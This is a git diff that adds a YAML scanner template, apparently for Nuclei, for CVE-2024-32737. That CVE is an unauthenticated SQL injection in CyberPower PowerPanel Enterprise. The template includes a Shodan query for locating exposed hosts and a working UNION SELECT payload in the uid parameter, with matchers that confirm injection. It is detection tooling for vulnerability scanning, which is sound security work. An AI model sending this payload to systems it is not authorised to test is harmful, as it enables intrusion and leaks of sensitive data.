diff --git a/http/cves/2024/CVE-2024-32737.yaml b/http/cves/2024/CVE-2024-32737.yaml new file mode 100644 index 0000000000..ff61f6d69e --- /dev/null +++ b/http/cves/2024/CVE-2024-32737.yaml @@ -0,0 +1,55 @@ +id: CVE-2024-32737 + +info: + name: CyberPower - SQL Injection + author: DhiyaneshDk + severity: high + description: | + A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3. + impact: | + An unauthenticated remote attacker can leak sensitive information via the "query_contract_result" function within MCUDBHelper. + reference: + - https://www.cyberpower.com/global/en/File/GetFileSampleByType?fileId=SU-18070002-07&fileSubType=FileReleaseNote + - https://www.tenable.com/security/research/tra-2024-14 + - https://nvd.nist.gov/vuln/detail/CVE-2024-32737 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-32737 + cwe-id: CWE-89 + epss-score: 0.00043 + epss-percentile: 0.09691 + metadata: + verified: true + max-request: 1 + shodan-query: html:"PDNU" + tags: cve,cve2024,cyberpower,sqli + +http: + - method: GET + path: + - "{{BaseURL}}/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - ':"finished"' + - '"success":' + condition: and + + - type: word + part: content_type + words: + - 'application/json' + + - type: status + status: + - 200 + + extractors: + - type: regex + group: 1 + regex: + - '"modifiedtime":"([0-9.]+)"'